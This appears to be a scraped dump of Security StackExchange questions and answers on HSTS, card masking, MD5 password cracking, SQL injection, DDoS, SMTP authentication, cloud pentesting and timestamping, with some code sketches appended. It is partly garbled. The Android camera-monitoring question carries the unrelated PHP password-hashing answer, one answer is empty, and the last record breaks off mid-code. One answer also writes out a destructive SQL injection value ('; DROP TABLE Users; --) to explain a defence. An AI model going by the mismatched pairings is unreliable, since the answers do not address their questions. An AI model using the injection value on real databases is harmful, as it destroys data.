144,843 | I recently set up a web server that—among others—serves ownCloud to some of my users. I got a Let's Encrypt SSL Certificate because I didn't want to use a self-signed certificate like the one ownCloud uses out of the box. I configured Apache to rewrite all HTTP traffic to HTTPS correctly. Now ownCloud shows me a message constantly, asking me to enforce HSTS (HTTP Strict Transport Security). Given that Let's Encrypt Certificates are only valid for 90 Days and that my HTTP redirection already works, should I really enforce HSTS? | Yes, you should activate HSTS . HTTPS without HSTS is significantly weaker since it makes your users vulnerable to downgrade attacks . Sending an HSTS header guarantees that users will directly connect to your website over SSL after their very first visit (trust-on-first-use) and until the specified timeout is reached. The choice of whether to activate HSTS doesn't really depend on which CA you're using, but rather on whether you are sure you will continue to support HTTPS in the future. That is, as soon as you disable HTTPS again, any user whose HSTS timeout hasn't expired yet will be unable to connect to your site. If you are unsure about how long you will keep SSL support, you might want to start with short HSTS expiry times to avoid locking out your visitors for too long. Don't confuse HSTS with HPKP : An HTTP Public Key Pinning header tells the browser to associate a specific public key with your site. Here, pinning the wrong or expired certificates can make your site unavailable to previous users. But for HSTS, the particular certificate chain doesn't matter and you can change it as needed. | {
"source": [
"https://security.stackexchange.com/questions/144843",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/122008/"
]
} |
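"Sending an HSTS header" is just one extra response header; a standard-library sketch for illustration — in practice you would set this in the Apache/nginx config, the one-year max-age is only an example, and the TLS setup is omitted:

```python
from http.server import BaseHTTPRequestHandler, HTTPServer

class HSTSHandler(BaseHTTPRequestHandler):
    def do_GET(self):
        self.send_response(200)
        # Browsers remember this for max-age seconds and refuse plain HTTP
        self.send_header("Strict-Transport-Security",
                         "max-age=31536000; includeSubDomains")
        self.send_header("Content-Type", "text/plain")
        self.end_headers()
        self.wfile.write(b"hello over (what should be) HTTPS\n")

# HTTPServer(("", 8443), HSTSHandler).serve_forever()  # wrap in TLS first
```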
144,980 | Let's say we have some software that is installed on a client-side OS. Is it possible to alter the software in such a way (e.g. for zip passwords) that an incorrect input is redirected to the correct "result"? Is it possible to alter software logic to execute one command instead of another? If so, can anything be protected from cracking at all? | In short, yes, you can modify the executable, use a debugger, etc. to alter the logic of the code being executed. But, that may not be enough. To use your example of ".zip passwords", password protected archives use the password to derive an encryption key. Unless you supply a correct password, the generated key will be wrong, and even if you modify it to use a wrong key, it will not successfully decrypt the ZIP file. Another scenario might involve a setuid executable which runs with higher privileges. You could run it under a debugger, or copy it to your user account and make changes, but all this will achieve is running it with your user's permissions, thus defeating exploitation possibilities. | {
"source": [
"https://security.stackexchange.com/questions/144980",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/56001/"
]
} |
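The key-derivation point is easy to demonstrate: patch out the password check all you like, a wrong password still derives a wrong key. A standard-library sketch, with a toy XOR stream standing in for the archive's real cipher:

```python
import hashlib, os

def derive_key(password: str, salt: bytes) -> bytes:
    # PBKDF2: the key exists only if you know the password
    return hashlib.pbkdf2_hmac("sha256", password.encode(), salt, 100_000)

def xor(data: bytes, key: bytes) -> bytes:
    return bytes(b ^ key[i % len(key)] for i, b in enumerate(data))

salt = os.urandom(16)
ciphertext = xor(b"secret archive contents", derive_key("correct horse", salt))

# An attacker who patches the "is the password right?" branch still loses:
print(xor(ciphertext, derive_key("wrong guess", salt)))    # garbage bytes
print(xor(ciphertext, derive_key("correct horse", salt)))  # original plaintext
```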
145,070 | I visited a local McDonald's, and I noticed part of my Visa number repeated on the receipt like this: NNNN NN__ ____ NNNN . (So out of a total of 16 digits it breaks down like this: First six digits revealed, middle six digits hidden, final four digits revealed again.) So only 6 digits were hidden. Finding the correct number would take 1.000.000 guesses, but there is also a checksum that further decreases the number of guesses needed to 100.000 (by my, possibly wrong, calculation). Is there a policy on how many digits can be revealed? Could cards be in danger if companies hide only the six middle digits? | As per PCI, the first 6 (BIN) and the last 4 can be shown, others should be masked: From an official 2008 PDF: PCI Data Storage Do’s and Don’ts : Never store the personal identification number (PIN) or PIN Block. Be
sure to mask PAN whenever it is displayed. The first six and last four
digits are the maximum number of digits that may be displayed. PAN is Primary Account Number So as far as compliance goes, the data terminal used to print the receipt is compliant. | {
"source": [
"https://security.stackexchange.com/questions/145070",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/133142/"
]
} |
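The PCI rule quoted above, rendered as a small masking helper — a sketch; real systems should mask even more aggressively whenever the full BIN isn't needed:

```python
def mask_pan(pan: str) -> str:
    """Show at most the first six and last four digits, per PCI guidance."""
    digits = pan.replace(" ", "")
    masked = digits[:6] + "*" * (len(digits) - 10) + digits[-4:]
    # regroup into the familiar blocks of four for display
    return " ".join(masked[i:i + 4] for i in range(0, len(masked), 4))

print(mask_pan("4111 1111 1111 1234"))  # -> 4111 11** **** 1234
```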
145,091 | Yet another serious router vulnerability has been disclosed: https://www.exploit-db.com/exploits/40889/ This is a command execution vulnerability through the web interface. I'm not too concerned about internal users being able to exploit it; I only allow trusted people on my network. However, a major concern is that external web sites could exploit it as a CSRF attack. How can I configure Chrome to prevent external web sites referencing or redirecting to my router? Ideally I'd like to still be able to manually browse to the router admin page, although I guess I can live without that. For FireFox, the NoScript plugin can do this using ABE - Application Boundaries Enforcer. As a workaround I have patched the router and put it on a non-predictable IP address. However, that's only a partial solution as further issues are likely to appear in future, and there are various ways for web pages to access private IP addresses (e.g. WebRTC, Java). | | {
"source": [
"https://security.stackexchange.com/questions/145091",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/31625/"
]
} |
145,369 | Apparently Yahoo was hacked yet again with up to a billion user accounts being compromised. The article says Yahoo uses MD5 for password hashing. Are the hackers likely to be able to crack the passwords too?
How long will it take to crack 1 password?
Is the time to crack 1 billion , just 1B * t ? | Yes, they were likely able to crack many of the passwords in a short time. From the official Yahoo statement : For potentially affected accounts, the stolen user account information may have included names, email addresses, telephone numbers, dates of birth, hashed passwords (using MD5) and, in some cases, encrypted or unencrypted security questions and answers. MD5 is a disputable choice for password hashing because its speed makes cracking MD5-hashed passwords really fast . Also, they are likely not salted, since Yahoo would have certainly let us know. (A salt would have helped to prevent the use of rainbow tables while cracking.) You can see the drawbacks of simple MD5 hashing when you compare it with the Ashley Madison breach in 2015 which leaked 36 million accounts. In that case, they used bcrypt with 2 12 key expansion rounds as opposed to Yahoo's plain MD5 which is why back then researchers could only decipher 4,000 passwords in a first attempt. From the article: In Pierce's case, bcrypt limited the speed of his four-GPU cracking rig to a paltry 156 guesses per second.
[...]
Unlike the extremely slow and computationally demanding bcrypt, MD5, SHA1, and a raft of other hashing algorithms were designed to place a minimum of strain on light-weight hardware. That's good for manufacturers of routers, say, and it's even better for crackers. Had Ashley Madison used MD5, for instance, Pierce's server could have completed 11 million [1] guesses per second , a speed that would have allowed him to test all 36 million password hashes in 3.7 years if they were salted and just three seconds if they were unsalted (many sites still do not salt hashes). So, cracking a large portion of the Yahoo passwords is a matter of seconds (while some stronger passwords will remain unbroken). An exact answer would depend on the available computation power and the password security awareness of Yahoo customers. [1] As @grc has noted, 11 million hashes per second appears rather slow. @Morgoroth's linked 8x Nvidia GTX 1080 Hashcat benchmark (200.3 GH/s for MD5 total) is a good resource for more up-to-date measurements.
"source": [
"https://security.stackexchange.com/questions/145369",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/25511/"
]
} |
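The back-of-the-envelope figures in the quote can be checked directly; a sketch using the article's 11 million MD5 guesses per second, and assuming one candidate password is tried per account (the dictionary size is my assumption, chosen to reproduce the quoted numbers):

```python
RATE = 11_000_000    # MD5 guesses/second quoted for Pierce's rig (slow by today's GPUs)
HASHES = 36_000_000  # leaked password hashes
GUESSES = 36_000_000 # assumed candidate passwords to try

# Unsalted: each candidate is hashed once and compared against all stored hashes
unsalted = GUESSES / RATE                             # ~3 seconds
# Salted: each candidate must be re-hashed separately for every individual salt
salted = GUESSES * HASHES / RATE / (3600 * 24 * 365)  # ~3.7 years

print(f"unsalted: ~{unsalted:.0f} s   salted: ~{salted:.1f} years")
```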
145,395 | During a web application test I have discovered a parameter tampering issue that allows a user to delete comments left by other users. They can't modify the content of other users' comments, and they can only view them where this is intentional. I'm now calculating the CVSS score using this calculator . It's pretty clear that the confidentiality impact is none, but I'm unclear about the others. So my question is: for the purpose of CVSSv3, is unauthorised deletion an integrity issue, or an availability issue (or both) ? | As pointed out in this (unanswered) question , Availability in CVSSv3 is about how well the web service performs, not whether its data is available: While the Confidentiality and Integrity impact metrics apply to the loss of confidentiality or integrity of data (e.g., information, files) used by the impacted component, this metric refers to the loss of availability of the impacted component itself, such as a networked service (e.g., web, database, email). To answer your question: only Integrity is relevant here. | {
"source": [
"https://security.stackexchange.com/questions/145395",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/31625/"
]
} |
145,563 | Sometimes we need to prove that a file was not created in advance - a good example is warrant canaries. The person releasing them may have been forced to sign the file with a future timestamp . For example, AutoCanary uses recent news headlines which is a very secure method, assuming the adversary can't predict future (or obviously manipulate the source of these headlines). Question : What are other secure ways to prove that a file was not created in advance? | If all parties can trust a common randomness beacon (like the NIST Randomness Beacon ), this can be achieved by including a recent block from the beacon into the file along with its timestamp. The recipients then, in addition to verifying the signature, must also verify that the beacon data is authentic and as recent as they require. Other public random values might also do the trick, for example, the winning numbers of a well-publicized lottery. But care needs to be exercised however that the items chosen have sufficient entropy. For example, if you just pick the closing value of the Dow Jones Industrial Average, that's been a 6- or 7-digit value for decades, so an attacker could just force you to precompute signatures for all likely future values of the index. The closing values of a list of stocks that all participants agree on beforehand might do the trick, though I'd want to do some calculations first to convince myself that the list has sufficient entropy. | {
"source": [
"https://security.stackexchange.com/questions/145563",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/109991/"
]
} |
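A sketch of the beacon approach from the answer, assuming the NIST Randomness Beacon 2.0 REST endpoint and its JSON field names — check the current API documentation before relying on either:

```python
import json, urllib.request

BEACON = "https://beacon.nist.gov/beacon/2.0/pulse/last"  # assumed endpoint

def freshness_proof() -> dict:
    """Fetch the latest public randomness pulse to embed in a file before signing."""
    with urllib.request.urlopen(BEACON, timeout=10) as resp:
        pulse = json.load(resp)["pulse"]
    # Nobody could have known outputValue before timeStamp, so a signature over a
    # file containing it proves the file was created after that moment.
    return {"beacon_time": pulse["timeStamp"], "beacon_value": pulse["outputValue"]}
```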
145,664 | I was just wondering how I could build a private network where it is physically impossible to gain access from outside but still have the option to publish data to some remote server. As an example: Let's say I have a network of devices that controls some kind of critical infrastructure and I don't want anyone to be able to access it except for the people on-site. However, I'd still like to send diagnostic information without notable delay to a remote server that can be accessed from the internet. Assumptions about the attacker: can break into any system that is connected to the internet does not have physical access to the private network So we can't just put a server that acts as a firewall between the public and private network, because all software has flaws and the attacker would gain access to the private network as soon as the firewall has been broken (except if we had a firewall where the rules are embedded in hardware or for some other reason impossible to be modified without physical access. Are there such devices?) What could solve the problem is a device that physically allows only unidirectional communication (in our case from the private to the public network). I don't know if there are any such devices, but I came up with some ideas: use any kind of write-only media, like CD-ROMs. Issues: high latency and requires specialized hardware to automatically move CDs between machines. paper printer/scanner setup: Have a printer in your private network that feeds directly into a scanner that is connected to the public network. Latency reduced to just a few seconds, but error-prone due to OCR. Fiber-optic communication: On the side of the receiver, physically remove the optical transmitter (or remove the receiver on the other side), therefore only unidirectional communication is possible. Probably won't work with Ethernet though (are there any network protocols that properly handle unidirectional communication?) Before I continue to make a fool out of myself because I've missed the obvious solution, I'd love to hear your comments on this :) | You can use a serial port. By default there are two data lines, one per direction, plus a ground wire (which is irrelevant here). By disconnecting the appropriate line you can prevent communication in a certain direction. It's really easy to use: at the very basic level I think you can run something like echo hello >> /dev/ttyS0 and receive it with cat /dev/ttyS0 at the other side. There is no complicated network stack to work around (which would prevent unidirectional communications as it would treat the lack of response as packet loss) and most languages have easy-to-use libraries to talk over serial ports. Here's an example in Python on how to send some JSON over serial: import serial, json
s = serial.Serial('/dev/ttyUSB0')
data = json.dumps({"status": "OK", "uptime": 60}).encode("utf-8") # make UTF-8 encoded JSON
s.write(data + b"\n") # send the JSON over serial with a newline at the end (a bytes literal, since data is already encoded) | {
"source": [
"https://security.stackexchange.com/questions/145664",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/133753/"
]
} |
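For completeness, the receiving side of the serial "data diode" sketched above — same pyserial assumption; since the return line is physically cut, the reader can never acknowledge or request a resend, so it simply drops corrupted frames:

```python
import serial, json  # pyserial, as in the sender sketch

s = serial.Serial('/dev/ttyUSB0', timeout=5)
while True:
    line = s.readline()  # blocks until a newline arrives or the timeout expires
    if not line:
        continue         # nothing received; one-way links cannot ask for a resend
    try:
        msg = json.loads(line.decode("utf-8"))
    except ValueError:
        continue         # corrupted frame: drop it, there is no way to NAK
    print("diagnostics:", msg)
```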
145,773 | On a whim I've recently decided to throw up the first proper website I created onto the local web server I use for development. I thought it'd be a great environment to throw some SQL at for injection as I know there are flaws and the site was only really meant for my own personal development. Anyway, to get to the point, after a few attempts the furthest I could get was to have the page return an error with the statement. I was trying to get into a specific test account I set up (if the result returns more than one account an error's thrown, so I didn't expect selecting every username where 1=1 to work), but every time I got a response as if I had entered a normal, incorrect password. I took a look at the PHP code and it turns out I was hashing the password before the query, so the attack was being hashed before it could do any harm. Being new to web security as a whole, and having an interest in web development, I was wondering whether there are any vulnerabilities with this method of SQL injection prevention as I expect to have not thought something through. Just to clarify, this isn't meant to be a "look guys I've found something new" as there are plenty of brighter sparks in information security than myself, who would have likely figured this out already, but I'd like to know why this likely isn't suitable as a security mechanism. | So, hashing the user password before entering it into the query is a coincidental security feature to prevent SQL injection, but you can't necessarily do that with all user input. If I'm looking up a Customer by their Name and I have a query like Select * from Customer Where Name like '%userInput%' If I set userInput as a hashed version of what was typed in, it wouldn't work correctly. Even if Name were also hashed in the database, it would only work for an exact search match. So if I had a Customer with Name "Sue" and I typed in a search for "sue", it wouldn't work. I also wouldn't know the names of the customers unless there was an exact match in my search, which isn't practical. The way you want to prevent SQL injection is to not build your queries like the one above. Instead, you'll want to process and parameterize inputs into a query, stripping out things like = signs and other symbols that don't make sense in the context of the input. A good guide for preventing SQL injection can be found here . | {
"source": [
"https://security.stackexchange.com/questions/145773",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/133845/"
]
} |
145,812 | SSL is meant to protect your website from a man-in-the-middle attack. But if someone is able to do that, couldn't they just request a new certificate from a CA and then modify the traffic sent from the CA to the server (which obviously can't be encrypted) to pass whatever test the CA requires as verification of ownership? | Being able to MitM a certificate authority is perhaps not as trivial as you imagine. You don't know what machine they're using to evaluate ownership, and hopefully they aren't doing this over Starbucks wifi. Certificates apply to domain names , not machines or IP addresses, and thus ownership is generally not verified by testing responses given by a certain HTTP server. For instance, taking a look at Mozilla's requirements for CAs , We consider verification of certificate signing requests to be acceptable if it meets or exceeds the following requirements: all information that is supplied by the certificate subscriber must be verified by using an independent source of information or an alternative communication channel before it is included in the certificate; for a certificate to be used for digitally signing or encrypting email messages, the CA takes reasonable measures to verify that the entity submitting the request controls the email account associated with the email address referenced in the certificate or has been authorized by the email account holder to act on the account holder’s behalf; for a certificate to be used for SSL-enabled servers, the CA takes reasonable measures to verify that the entity submitting the certificate signing request has registered the domain(s) referenced in the certificate or has been authorized by the domain registrant to act on the registrant’s behalf; for certificates to be used for and marked as Extended Validation, the CA complies with Guidelines for the Issuance and Management of Extended Validation Certificates version 1.4 or later. So you would need to either MitM the connection between the CA and a DNS server, or compromise the site's DNS (the more likely one). | {
"source": [
"https://security.stackexchange.com/questions/145812",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/-1/"
]
} |
146,050 | So I get the basic idea of (D)DoS used for flooding, but I don't quite understand how this causes servers to crash or get them to slow down due to CPU overuse. As far as I know, the thing that is used to slow down a server is the TCP SYN handshake, but that takes a trivial amount of CPU. How does one crash a server using (D)DoS? | How does one crash a server using (D)DoS? To specifically answer your question, to crash a server using only DDoS you need to target the Application Layer (detailed explanation below). These types of attacks specifically attempt to use up as much of the target server's resources as possible and bring it down, rather than just hammer it with network traffic. However, to put this into context alongside other types of DDoS attacks, let's explore their major categories and their uses. This article covers the 3 major attack types for DDoS. From the article: DDoS attacks can be broadly divided into three types: Volume Based Attacks Includes UDP floods, ICMP floods, and other spoofed-packet floods. The attack’s goal is to saturate the bandwidth of the attacked site, and magnitude is measured in bits per second [sic] "(Bps)" [sic]. Protocol Attacks Includes SYN floods, fragmented packet attacks, Ping of Death, Smurf DDoS and more. This type of attack consumes actual server resources, or those of intermediate communication equipment, such as firewalls and load balancers, and is measured in Packets per second. Application Layer Attacks Includes low-and-slow attacks, GET/POST floods, attacks that target Apache, Windows or OpenBSD vulnerabilities and more. Comprised of seemingly legitimate and innocent requests, the goal of these attacks is to crash the web server, and the magnitude is measured in Requests per second. TL;DR - there are multiple types of DDoS attacks depending on what the attacker wants to achieve. Sometimes an attacker will just want to take up all the available bandwidth, other times they will try to overwhelm the CPU. It's worth noting that DDoS is just a distributed type of the generic ' Denial of Service ' - it does not imply crashing a server at all, only preventing the server from doing whatever it's intended for, whether that's preventing actual business from taking place by using all bandwidth or otherwise. | {
"source": [
"https://security.stackexchange.com/questions/146050",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/114265/"
]
} |
146,090 | Nowadays there are a lot of hacked websites with stolen login information. In many cases the website states that no credit card data and/or payment information was stolen. Why is that? What I assume is: That both, the database storing the payment data and the one storing user-credentials are separated from each other. So far so good. But what I do not understand: Why shouldn't they be able to find access to the database storing payment information? The latter is still visible/accessible from the outside; that is because users of the website can also view/add/edit their own payment information, e.g. whether they want to use paypal/credit card/IBAN. So the database is obviously accessible from the "outside world". | PCI DSS The major reason for this is a decade long effort by the payment cards industry to limit the extent of such breaches by requiring everyone who handles payment card data to either (a) conform to a set of security practices and (usually) audit requirements, or (b) stop handling payment card data themselves and delegate it to someone who can handle this better. You shouldn't underestimate the second part - while pretty much all sites handle their own user account data, the vast majority of sites (especially smaller ones) that accept credit card payments do not store credit card data in any way whatsoever; if they do want recurring payments without asking CC number every time, they instead store 'just enough' information to show the user (e.g. a partial card number) that this card is "remembered" plus a token issued by their bank/gateway/whatever that enables additional payments from this card to the same merchant - so these tokens are useless to an attacker. While it's not 100% proof and there are many, many cases where PCI DSS is blatantly violated, it does mean a significant reduction in the number of vulnerable companies. | {
"source": [
"https://security.stackexchange.com/questions/146090",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/35367/"
]
} |
146,119 | I'm going to be connecting to one of my servers from my boss' computer (Win 10) using PuTTY. In order to do so, I'll be using my private key. Is there anything I should do before/after to prevent my key from being stolen? My plan was: Install PuTTY add priv_key file to it connect … Uninstall PuTTY remove priv_key | A more secure alternative is to create a new keypair that you use for this purpose. Create the keypair on your boss' computer. Transfer the public key to your own computer. Connect to the server and add the public key. Now your boss' computer can connect to the server. When this is done, you can remove the key on the server. This way, your own key does not leave your computer and your boss' key is only valid for a short while.
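In practice on Windows you would generate the throwaway pair with PuTTYgen, but just to show the shape of the idea, here is a hedged sketch in Python (assuming the third-party cryptography package; nothing here is specific to PuTTY, it only illustrates a disposable keypair): from cryptography.hazmat.primitives.asymmetric import ed25519
from cryptography.hazmat.primitives import serialization
key = ed25519.Ed25519PrivateKey.generate()  # fresh key that never touches your own machine
pub = key.public_key().public_bytes(serialization.Encoding.OpenSSH,
                                    serialization.PublicFormat.OpenSSH)  # this line goes into the server's authorized_keys
priv = key.private_bytes(serialization.Encoding.PEM,
                         serialization.PrivateFormat.OpenSSH,
                         serialization.NoEncryption())  # stays on the boss' computer and is discarded afterwards | {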
"source": [
"https://security.stackexchange.com/questions/146119",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/108682/"
]
} |
146,219 | I want to pentest websites and services programmed by our company, which is fine as long as we test it on our own infrastructure. What are the (legal) implications when pentesting our services once they have been deployed to other platforms like AWS, Azure etc? Since we technically do not own the target system (we just rented a share of it), would I have to get clearance from the hosters? Obviously their implementation of a hosted service greatly affects security, so I'd like to compare the differences to our own intranet hosting. | In general, you're correct that you'll need the permission of the hosting company where you are scanning services deployed on their infrastructure. This is partially so that their Intrusion Detection Systems are aware that it's an authorised scan. Both AWS and Azure have policies detailing the process and what's acceptable to test. The AWS one is here and the Azure one is here . If a hosting company doesn't have a published policy, it's worth contacting them to check. Also it can depend on the exact service that you're using from the cloud hosting provider. So for example for AWS, they allow you to test IAAS style offerings such as AWS EC2 where the customer is responsible for the operating system and not SAAS offerings like AWS S3 where Amazon are responsible for the operating system and associated software. However Azure appears to have a more wide ranging policy where you can test any services you own. Also test types can be restricted, for example DoS testing may well not be allowed as obviously that can have an effect on the cloud provider. For "traditional" hosting it generally depends on the type of service you have. If you're using shared hosting where you just have access to the webroot you may well be restricted from testing, as obviously there's a risk of affecting other users on the same server, however where you have a full OS image (e.g. Digital Ocean Droplets) you tend to be ok as long as you've notified them (in the case of Digital Ocean, via a support ticket). There's also a longer list of where to go for different companies here | {
"source": [
"https://security.stackexchange.com/questions/146219",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/133408/"
]
} |
146,371 | I mean, if I am, for example, on Facebook, every packet I send out of my NIC is encrypted. But there must be phase of that packet before it is encrypted. The browser (I think) must create that packet and encrypt it afterwards. So if I am on the machine creating those packets, am I able to see them before encryption? And if yes, are there malware capable of doing this? I think with administrator/root privileges it is certain that it can, but what about without them? | With the availability of browser extensions, actually reading the traffic should be quite doable. If both the malware and web browser run as the same user (and therefore can write to the browser profile directory), then installation of browser extensions can be done relatively easily. You can also open the Web Developer Tools , typically accessible by pressing F12 and visit the Networking tab. That will show you all traffic before it is encrypted and pushed onto the network. The above methods are passive ways that do not interfere with communications. Active methods perform a man in the middle (MitM) attack and actually modify data before it gets forwarded (Tylerl describes an example with Fiddler). | {
"source": [
"https://security.stackexchange.com/questions/146371",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/92184/"
]
} |
146,456 | If the admin is a super user, nothing can prevent them from installing anything on my host, including a keystroke logger. Are there any security mechanisms that can protect my account against that? | No, you can't protect yourself against a privileged user. Any piece of software you can install to protect you could be uninstalled or deactivated by the privileged user. That's why it is said that when a computer is compromised and the attacker gets root access (or it is possible that he did), you just don't control that computer anymore. If you don't trust the computer administrator or whoever has access to an administrator account then you shouldn't store any data that you don't want them to access | {
"source": [
"https://security.stackexchange.com/questions/146456",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/134465/"
]
} |
146,524 | Say you have to choose only one among the following authentication types for your own SMTP server: LOGIN, PLAIN CRAM-MD5 DIGEST-MD5 NTLM/SPA/MSN Which one would you recommend for optimal security? PS: The list is the authentication types given in man swaks | With SSL/TLS it's okay to use LOGIN / PLAIN . You should provide SMTP on top of an SSL-encrypted connection. While some schemes from your list (e.g. DIGEST-MD5 ) can keep a password secure even over an untrusted channel, they won't protect users from a man-in-the-middle attacker tampering with their session. (Commonly, email servers wrap SMTP via direct TLS or a connection upgrade with STARTTLS at ports 465/587.) Any SMTP auth type, regardless of whether you use PLAIN or an advanced method, just provides application level authentication. But what you want is transport level security . After a user is authenticated over SMTP, there will be no automatically encrypted connection. Per the SMTP protocol, commands and emails are exchanged with the server in plain text, allowing a man-in-the-middle attacker to read and modify the communication and inject new commands. That's why you should provide it on top of SSL encryption, just like HTTPS provides HTTP on top of SSL. The HTTP analogy: If you secure your website with HTTPS, then it doesn't matter that a login form actually transmits your password as a plain string in the POST body of the HTTP request, because the data transport is SSL-encrypted. Enabling CRAM-MD5 for SMTP is analogous to implementing a challenge-response scheme in Javascript before transmitting login credentials to a website. (You can occasionally see that technique in router interfaces which don't provide HTTPS but it's not very common.) As for a real-life example, GMail is fine with offering LOGIN / PLAIN authentication (where credentials are sent in plain text) after having established a secure SSL connection: $ openssl s_client -starttls smtp -connect smtp.gmail.com:587
...
250 SMTPUTF8
EHLO foo
250-smtp.gmail.com at your service, [127.0.0.1]
250-SIZE 35882577
250-8BITMIME
250-AUTH LOGIN PLAIN XOAUTH2 PLAIN-CLIENTTOKEN OAUTHBEARER XOAUTH
250-ENHANCEDSTATUSCODES
250-PIPELINING
... (As you can see, they also provide some methods you didn't list, e.g. XOAUTH2 for OAuth2 tokens which might be interesting if you're after passwordless authentication.)
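For completeness, the corresponding client-side flow with Python's standard smtplib (hostname and credentials are placeholders): import smtplib
s = smtplib.SMTP("smtp.example.com", 587)
s.starttls()  # upgrade the plaintext session to TLS before anything sensitive is sent
s.login("user@example.com", "app-password")  # AUTH LOGIN/PLAIN now travels inside the TLS channel
s.quit() | {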
"source": [
"https://security.stackexchange.com/questions/146524",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/126446/"
]
} |
146,595 | Normal SQL injections are no problem since I always use prepared statements, but how to protect oneself from second order SQL injections ? | A second order SQL injection is an injection where the payload is already stored in the database (instead of say being delivered in a GET parameter). In that sense it is somewhat similar to stored XSS (and ordinary "first order" SQL injection would be analogous to reflected XSS). How does it work? Let's say you let users pick any username. So an attacker could choose the name '; DROP TABLE Users; -- . If you naively concatenate this username into your SQL query to retrieve information about that user you have a problem: sql = "SELECT * FROM Users WHERE UserName = '" + $username + "'"; So, how do you deal with this? Always use parameterized queries, always, always, always. Treat all variables as untrusted user data even if they originate from the database. Just pretend everything is GET parameters, and behave accordingly by binding them as parameters. You can also sanitize and limit the input (e.g. only allow alphanumeric usernames) before it is stored in the database as well as after it is retrieved from the database. But I would not rely on that as my only line of defence, so use parameterized queries as well.
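A minimal sketch of the "bind it in both directions" rule (Python's sqlite3 here purely for illustration): import sqlite3
conn = sqlite3.connect(":memory:")
conn.execute("CREATE TABLE Users (UserName TEXT)")
evil = "'; DROP TABLE Users; --"
conn.execute("INSERT INTO Users VALUES (?)", (evil,))  # bound on the way in
(stored,) = conn.execute("SELECT UserName FROM Users").fetchone()
row = conn.execute("SELECT * FROM Users WHERE UserName = ?",
                   (stored,)).fetchone()  # and bound again on the way out, even though the value came from our own database | {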
"source": [
"https://security.stackexchange.com/questions/146595",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/124007/"
]
} |
146,713 | I'm not a cybersecurity expert but just a webmaster and I wonder if this kind of authentication would be dangerous. I test the password like this on the server side using PHP: if (isset($_POST['pass_word']) AND $_POST['pass_word'] == $passwd) $passwd comes from my PostgreSQL DB. I thought at least I don't risk SQL injection. Do I risk some other kind of injection? If it's a hazardous way to authenticate please explain why. | This looks like you're storing passwords in the clear, which is a bad idea. You should ensure passwords are protected using, at minimum, password_hash() and password_verify() , which use bcrypt under the hood. This is simple, easy, safe, and perfectly acceptable for most scenarios. Alternatively you can use a slightly more secure method such as Argon2 , which won the Password Hashing Competition and is resistant to CPU and GPU cracking, and also aims to minimise the potential for side-channel attacks. There's an article which explains how to use Argon2 as part of libsodium's PHP wrapper, or directly using Paragon's "Halite" library, which offers Argon2 with symmetric encryption on top to prevent database-only access from providing usable hashes, due to the fact that the symmetric key is stored on the server's disk as a file. This option is more complicated, but it does offer some additional security if you're truly paranoid. I'd suggest avoiding this if you're unfamiliar with secure development, though, as the chances of you messing something up are increased. I'd also recommend using === in order to avoid weird cases of false equality using arrays in URL queries or nulls.
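The hash-then-verify flow described above, sketched in Python with the bcrypt package just to show its shape (in PHP it is literally password_hash() and password_verify()): import bcrypt
hashed = bcrypt.hashpw(b"correct horse battery staple", bcrypt.gensalt())  # store this hash, never the password itself
ok = bcrypt.checkpw(b"login attempt", hashed)  # constant-time verification; don't compare hashes with == yourself | {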
"source": [
"https://security.stackexchange.com/questions/146713",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/134709/"
]
} |
146,721 | Unavoidable issue of modern cell phones is that they have a front and rear side camera covering almost a 360deg view. And that some applications like, say Facebook request access for everything. So basically a normal user has at least an app that has camera permissions, and even though they intend to use it rarely, there's no info about when it turns on. My question is, is there a way to monitor when do apps that have those permissions actually turn on the camera? (Let's narrow it down to Android) | This looks like you're storing passwords in the clear, which is a bad idea. You should ensure passwords are protected using, at minimum, password_hash() and password_verify() , which use bcrypt under the hood. This is simple, easy, safe, and perfectly acceptable for most scenarios. Alternatively you can use a slightly more secure method such as Argon2 , which won the Password Hashing Competition and is resistant to CPU and GPU cracking, and also aims to minimise the potential for side-channel attacks. There's an article which explains how to use Argon2 as part of libsodium's PHP wrapper, or directly using Paragon's "Halite" library, which offers Argon2 with symmetric encryption on top to prevent database-only access from providing usable hashes, due to the fact that the symmetric key is stored on the server's disk as a file. This option is more complicated, but it does offer some additional security if you're truly paranoid. I'd suggest avoiding this if you're unfamiliar with secure development, though, as the chances of you messing something up are increased. I'd also recommend using === in order to avoid weird cases of false equality using arrays in URL queries or nulls. | {
"source": [
"https://security.stackexchange.com/questions/146721",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/52758/"
]
} |
146,806 | I need to prove that all my pictures were taken before a certain date. Is uploading them to Picassa, Flickr or a similar service a good way to achieve such timestamping? | In general, the problem of Secure Timestamping is actually a complex topic with no single right answer. There are two general approaches: 1) a trusted "Timestamping Authority" keeps logs of when stuff happened and everybody believes them because that's literally their job. 2) Using cryptography in some way. In general the crypto approaches don't work very well and can only prove that photo A was logged before photo B, but not the exact time. There are lots of companies on the market who offer timestamping services based on one of these two approaches. How much you want to trust them depends on how transparent the company is with their practices, and what local laws apply. So, for your situation: it sounds like somebody is requiring you to do this (maybe for legal reasons?). You should find out the level of trust they need in the timestamping authority. What you have come up with is to use Picassa or Flickr as a trusted Timestamping Authority. Depending on what you need the timestamp for, that might be ok. For example, if it's to win a bet with your friend, then the upload time on Picassa or Flickr is probably fine. If this is to prove ownership of multi-billion dollar real estate holdings, then you may want to involve a notary. Basically, ask yourself this question: is the dollar value that you stand to gain or lose greater than what it would cost to hack or bribe Picassa into changing a timestamp? If no then you're fine. If yes, then you need a more official timestamping service.
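Whichever route you take, the usual building block is to commit to a cryptographic digest of each file rather than the file itself; a minimal sketch with Python's standard library (the filename is a placeholder): import hashlib
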